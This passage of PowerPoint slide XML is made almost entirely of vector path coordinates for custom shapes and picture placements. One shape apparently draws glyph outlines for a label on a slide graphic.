                    <a:pt x="3455230" y="1991562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3450315" y="1952223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3445400" y="1917801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3479805" y="1922718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3519125" y="1927635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3553529" y="1932553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3592849" y="1932553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3700979" y="1922718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3755044" y="1907966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3804193" y="1893213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853343" y="1873544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3897578" y="1848956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3976218" y="1789947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4045027" y="1721103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4069602" y="1676846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4094177" y="1637507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113837" y="1593250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4133497" y="1494901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4138412" y="1445726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4133497" y="1396552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123667" y="1347378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113837" y="1303121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4094177" y="1258864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4069602" y="1214607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4045027" y="1175267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4010623" y="1135928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3976218" y="1101506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936898" y="1072001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3897578" y="1047414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853343" y="1017909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3804193" y="998240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3755044" y="983487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3700979" y="968735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3592849" y="958900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3558444" y="963817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3524040" y="963817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489635" y="968735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="978570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455230" y="850716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3450315" y="811377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3445400" y="776955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3435570" y="742533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3425740" y="713028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3415910" y="678606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386420" y="609762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3356930" y="550753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3337270" y="521248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317610" y="496661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297951" y="467156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273376" y="442569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253716" y="417982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3229141" y="393395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3204566" y="373725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3179991" y="349138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3121011" y="309798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3032542" y="265541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968647" y="240954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2899837" y="221284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796623" y="206532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762218" y="206532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698323" y="211449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639343" y="216367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2580364" y="236037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521384" y="250789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413254" y="299963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2369019" y="334385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319870" y="368807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2270720" y="290128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241230" y="255706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2211740" y="216367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142930" y="157358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2103611" y="127853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2059376" y="98348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015141" y="78679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1975821" y="59009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926671" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882437" y="24587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1833287" y="9834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1734987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7391CB3F-0756-C302-FFB2-480CAED39FD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920" y="2208657"/>
              <a:ext cx="3897578" cy="2443967"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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53CB4211-D543-7D1F-1F22-FA03273CE05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31" y="2116881"/>
              <a:ext cx="4374869" cy="2717800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7764866D-29CE-F946-AF0C-5F1ABF7493F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3924" y="3146549"/>
              <a:ext cx="353009" cy="561924"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5C82CC07-C76B-0459-7C4B-EF0F7B4B6EAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4638579" y="3108767"/>
              <a:ext cx="431165" cy="618490"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="370141" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="591120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61922" y="618016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143878" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65791" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61509" y="602827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63724" y="602430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26321" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51161" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368763" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366930" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410961" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370141" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="63724" y="602430"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61509" y="602827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65791" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63724" y="602430"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415833" y="539326"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="63724" y="602430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65791" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143878" y="603328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="551908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="539326"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="10446" y="579289"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579289"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="581248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26321" y="586184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581248"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="579289"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579289"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="421995" y="538221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="539326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421995" y="538221"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430791" y="538221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="421995" y="538221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="545617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="538221"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415833" y="32542"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="539326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421995" y="538221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="538221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420779" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="32542"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="77147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="51161" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51161" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415833" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420779" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430791" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420779" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="410961" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="366930" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370739" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368763" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="21996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410961" y="14804"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="366930" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="368763" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370739" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366930" y="14804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89331486-7D07-D6E5-90F9-4FEACB5E727B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4571918" y="3701818"/>
              <a:ext cx="573405" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="573404" h="155575">
                  <a:moveTo>
                    <a:pt x="573012" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573012" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573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1908D07B-3443-A71D-4120-60D312BCEA30}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583419" y="3732338"/>
              <a:ext cx="551180" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="64758" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61730" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61730" y="38343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="38343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="21539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64758" y="21539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64758" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="103954" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82050" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82050" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103954" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103954" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="104564" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81440" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81440" y="16560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104564" y="16560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104564" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="147723" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="125818" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125818" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="48788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150466" y="47812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153026" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157781" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175215" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168268" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170847" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172350" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173379" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175215" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="165912" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163796" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156704" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152518" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="223210" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="187082" y="45625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184501" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185183" y="68788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208929" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209109" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217192" y="95677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226847" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232151" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236987" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245724" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250377" y="92577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221930" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216423" y="79471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208946" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206914" y="69738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206589" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256595" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256595" y="56733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256313" y="52752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256231" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206528" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206836" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206853" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208356" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211079" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213707" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217236" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252160" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251880" y="37219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248224" y="32552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243518" y="28883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237782" y="26261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231394" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232329" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223210" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="255315" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="252877" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250377" y="74960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246964" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238308" y="80060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233837" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="252160" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="225974" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229326" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231460" y="41269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233614" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234671" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234752" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234853" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256231" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256070" y="49311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254681" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254607" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254497" y="42806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252160" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="289818" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266897" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287847" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311255" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317585" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301522" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289818" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="341957" y="48483"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="324991" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338869" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362054" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368619" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349252" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341957" y="48483"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="335415" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="316071" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301522" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317585" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324991" y="48483"/>
                  </a:lnTo>
